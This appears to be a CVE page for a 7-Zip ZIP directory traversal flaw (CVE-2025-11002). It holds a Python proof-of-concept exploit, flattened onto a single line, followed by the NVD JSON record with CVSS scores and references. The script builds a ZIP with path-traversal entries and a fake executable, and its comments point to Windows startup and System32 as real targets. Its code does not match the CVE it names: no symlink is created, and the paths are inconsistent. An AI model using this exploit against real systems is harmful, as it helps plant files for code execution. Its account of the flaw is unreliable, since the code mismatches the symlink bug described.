CVE-2025-11002

#!/usr/bin/env python3 # CVE-2025-11002 PoC - 7-Zip ZIP Directory Traversal RCE # This PoC demonstrates the directory traversal vulnerability in 7-Zip's symlink handling import zipfile import os import sys def create_malicious_zip(output_path): """ Create a malicious ZIP file with symlink to achieve directory traversal """ # Create symlink pointing to system startup directory # In real attack, this would be crafted to write to startup folder symlink_target = "../../../../../../../../Windows/System32" malicious_filename = "malicious.exe" # Create the malicious executable content malicious_content = b'MZ' + b'\x00' * 100 + b'\x90' * 100 with zipfile.ZipFile(output_path, 'w') as zipf: # Add the malicious file zipf.writestr(malicious_filename, malicious_content) # Add symlink entry (implementation depends on ZIP format support) # Note: Standard ZIP doesn't support symlinks, but 7-Zip may create them # from filenames containing path traversal sequences # Alternative: Create entry with path traversal in filename traversal_name = "../../../../tmp/payload.exe" zipf.writestr(traversal_name, malicious_content) print(f"[+] Created malicious ZIP: {output_path}") print(f"[+] Contains file: {traversal_name}") print(f"[!] When extracted by vulnerable 7-Zip, file will be written to /tmp/payload.exe") def verify_zip_structure(zip_path): """Verify the ZIP file structure""" with zipfile.ZipFile(zip_path, 'r') as zipf: print("\n[+] ZIP file contents:") for info in zipf.infolist(): print(f" - {info.filename}") if __name__ == "__main__": output_file = "CVE-2025-11002_poc.zip" create_malicious_zip(output_file) verify_zip_structure(output_file) print("\n[!] This PoC demonstrates the vulnerability concept.") print("[!] In real attacks, the symlink would be crafted to write to executable paths.")

{"cve": {"id": "CVE-2025-11002", "sourceIdentifier": "[email protected]", "published": "2026-01-23T04:16:00.553", "lastModified": "2026-02-26T20:03:49.037", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "7-Zip ZIP File Parsing Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of 7-Zip. Interaction with this product is required to exploit this vulnerability but attack vectors may vary depending on the implementation.\n\nThe specific flaw exists within the handling of symbolic links in ZIP files. Crafted data in a ZIP file can cause the process to traverse to unintended directories. An attacker can leverage this vulnerability to execute code in the context of a service account. Was ZDI-CAN-26743."}, {"lang": "es", "value": "Vulnerabilidad de ejecución remota de código por salto de directorio en el análisis de archivos ZIP de 7-Zip. Esta vulnerabilidad permite a atacantes remotos ejecutar código arbitrario en instalaciones afectadas de 7-Zip. Se requiere interacción con este producto para explotar esta vulnerabilidad, pero los vectores de ataque pueden variar dependiendo de la implementación.\n\nLa falla específica existe en el manejo de enlaces simbólicos en archivos ZIP. Datos manipulados en un archivo ZIP pueden hacer que el proceso se desplace a directorios no deseados. Un atacante puede aprovechar esta vulnerabilidad para ejecutar código en el contexto de una cuenta de servicio. Fue ZDI-CAN-26743."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:7-zip:7-zip:24.09:*:*:*:*:*:*:*", "matchCriteriaId": "B0CE235C-0238-4BFD-A447-9B83469F6598"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-950/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}